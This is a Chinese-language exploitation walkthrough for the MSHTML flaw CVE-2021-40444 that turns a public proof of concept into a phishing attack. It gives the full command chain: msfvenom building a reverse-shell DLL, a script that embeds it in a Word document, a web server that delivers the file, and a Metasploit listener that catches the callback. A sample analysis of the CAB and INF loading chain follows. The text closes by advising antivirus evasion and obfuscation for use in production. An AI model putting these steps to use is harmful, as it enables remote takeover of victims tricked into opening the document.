利用CVE-2021-40444漏洞钓鱼执法上线MSF

0x01 漏洞描述

2021年9月8日，微软官方发布了关于MSHTML组件的风险通告（漏洞编号：CVE-2021-40444），未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。

Microsoft 发现，存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后，攻击者必须诱使用户打开此恶意文件。

0x02 漏洞影响

漏洞编号：CVE-2021-40444

影响版本：Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本，覆盖面比较广泛，主要用于Office钓鱼。

0x03 测试环境

**攻击机：**kali-linux 2022.1

**靶机：**windows 10（office 2013）

本次漏洞使用lockedbyte师傅的POC，结合kali-linux中metersploit工具

下载地址：

(https://github.com/lockedbyte/CVE-2021-40444)

0x04 漏洞应用场景

4.1 Kali安装依赖包

sudo apt-get install lcab -y

4.2 生成含有后门的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f dll -o http.dll

下载Poc，进入CVE-2021-40444文件目录下修改exploit.py权限添加写权限，将生成的http.dll程序拷贝到Poc文件夹中并添加写权限。

sudo git clone https://github.com/lockedbyte/CVE-2021-40444

4.3 利用POC脚本生成含有恶意代码的word文件

sudo python3 exploit.py generate http.dll 本地服务器URL

含有恶意代码的Word文件生成后输出位置在out目录下。

4.4 将含有恶意代码的word文件发送给目标

进入out目录下，启动Python服务器。

python3 -m http.server 80

诱导目标用户点击含有恶意代码的word文件。

4.5 创建监听

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 12.12.12.134 //本地监听IPLHOST => 12.12.12.134msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口LPORT => 4444msf6 exploit(multi/handler) >exploit

4.6 漏洞触发

文件启动时与服务器获取连接。

目标主机成功上线MSF。

0x05 病毒样本分析

5.1 本地杀软病毒样本检测

5.2 在线病毒样本检测

恶意文件执行流程，文件中创建了MSOSYNC.EXE进程，该进程主要收集操作系统硬件相关的指纹信息

（MachineGuid，DigitalProductId，SystemBiosDate）获取系统信息，包含查询计算机时区的功能。

5.3 样本分析详情

解压样本文件

样本文件中的document.xml.rels中存储了指向的恶意html网站链接，浏览器会自动打开网站链接。

该URL下载一个名为word.html，HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe. CAB文件已打开，INF文件存储在%TEMP%\Low目录中

由于CAB中存在路径遍历（ZipSlip）漏洞，因此可以将INF存储在%TEMP%中，使用“.cpl:”指令打开INF文件，导致通过rundll32侧面加载INF文件。

攻击者通过伪造cab文件内嵌含有载荷的dll文件，借助漏洞使html文件JavaScript加载含有恶意代码的dll，从而远程执行payload。

文中漏洞利用并未进行免杀处理，如在生产环境下利用时，可结合Office宏病毒等免杀系列技巧进行免杀、混淆，从而获取目标控制权限。

参考链接

https://baijiahao.baidu.com/s?id=1715778340261801914
https://github.com/lockedbyte/CVE-2021-40444
http://www.chinainfosec.org.cn/index.php?m=content&c=index&a=show&catid=57&id=488
https://blog.csdn.net/qq_43332010/article/details/120463783
https://www.ddosi.org/cve-2021-40444-exp/

声明

以上内容，均为文章作者原创，由于传播，利用此文所提供的信息而造成的任何直接或间接的后果和损失，均由使用者本人负责，长白山攻防实验室以及文章作者不承担任何责任。